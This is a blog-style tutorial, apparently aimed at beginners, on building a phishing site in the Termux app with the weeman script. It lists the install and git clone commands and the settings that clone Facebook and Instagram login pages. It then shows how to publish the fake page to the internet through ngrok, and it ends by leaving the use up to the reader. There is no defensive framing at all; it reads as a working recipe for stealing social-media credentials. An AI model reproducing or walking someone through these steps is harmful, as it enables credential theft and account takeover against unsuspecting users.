Want to create a phishing web easily and for free? Try using the following method. Namely using the weeman script that runs in the termux application.
Just install weeman on termux then select the web page you want to clone (cloning). Next set the weeman configuration.
Weeman script
Weeman is a cli-based server service provider that can be used to run web phishing social media such as Facebook, Instagram, etc.
However the weeman server is running on localhost. So that the phishing website can later be accessed by other people, you must use ngrok forwarding or the like.
Here’s how to use weeman to make phishing
1. Install the weeman script in the termux application
Open the termux application then write all the commands below:
$ apt update && apt upgrade $ pkg install git $ pkg install python2 $ pip2 install bs4 $ pip2 install beautifulsoup $ git clone https://github.com/samyoyo/weeman
Remove $ and use all lowercase
Wait until the installation process is complete.
If that fails, try to clone from the following address:
git clone https://github.com/evait-security/weeman
2. Specify the site page to clone
First run the weeman script. How to type the following command:
cd weeman python2 weeman.py
The initial screen will look like the image below:

Then you specify what site you want to duplicate. For example here I take a facebook page.
So the command entered is:
$ set url https://facebook.com $ set port 8080 $ set action_url https://facebook.com $ run
If you want to clone another page, please just change the section set url and set action_url.
For example, if you want to clone an Instagram page, then:
$ set url https://www.instagram.com $ set port 8080 $ set action_url https://www.instagram.com $ run
Remember!! Instagram site using www.
3. Copy the link that appears from the run weeman process
Since weeman runs on localhost, it is certain that the link that appears is http://localhost:port
This port is determined from the set port command above. So using port 8080, the link that appears automatically is:
http://localhost:8080
Please copy the link above and access it from a browser to see the phishing site that was just created.
The link only applies to our own cellphones and other cellphones that are on the same network (eg friends riding hotspots). If you want to display it to the public, you can use ngrok forwarding.
4. Enable ngrok forwarding (optional)
You can activate it or not, depending on your individual needs.
To run this step, you must have ngrok installed in termux. Just look for the tutorial on the omcyber blog.
Okay I assume you all have ngrok.
So just open the new season termux by swiping the screen from left to right and then selecting new season.
Next type the following command:
cd ngrok ./ngrok http 8080
Ngrok will run and for the display please see the picture.

There are 2 links appear on ngrok, just copy one of them. The link also includes from the phishing site Weeman.
Next, please access using a browser.
Notes:
If the phishing site doesn’t appear, try enabling ngrok forwarding after running the first command (install weeman).
Until here everything is finished, then it’s up to you what to do with the phishing weeman.
For information! the weeman phishing site will remain active as long as the weeman script in the termux application is still running. So don’t close termux if you haven’t finished using phishing or you have to create it again from scratch.
Ok, now we have learned how to create a phishing site using weeman in termux application. If from your side it still fails, please just ask through the comments column.